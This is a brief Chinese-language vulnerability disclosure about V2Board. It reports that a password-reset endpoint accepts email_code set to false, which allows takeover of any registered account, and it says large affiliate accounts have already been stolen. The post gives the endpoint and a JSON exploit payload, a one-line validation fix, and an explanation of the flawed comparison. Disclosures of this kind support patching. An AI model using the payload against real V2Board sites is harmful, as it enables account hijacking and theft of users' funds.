🖼 V2Board全系列漏洞可修改任意用户账号密码,已有大AFF账号被盗号提现。
V2Board全系列漏洞可修改任意用户账号密码,已有大AFF账号被盗号提现。
复现URL:api/v1/passport/auth/forgetPayload:
{
"email":"任意一个已注册用户",
"password": "密码",
"email_code": false
}
修复:
app/Http/Requests/Passport/AuthForget.php
将'email_code' => 'required'
修改为'email_code' => 'required|string|digits:6'
原理:
如果攻击者发送的请求参数中 email_code 是一个空字符串或者导致转换后为空的值,且此时缓存刚好失效(返回 null),那么:
"" !== "" 的结果为 false,从而判定验证通过。














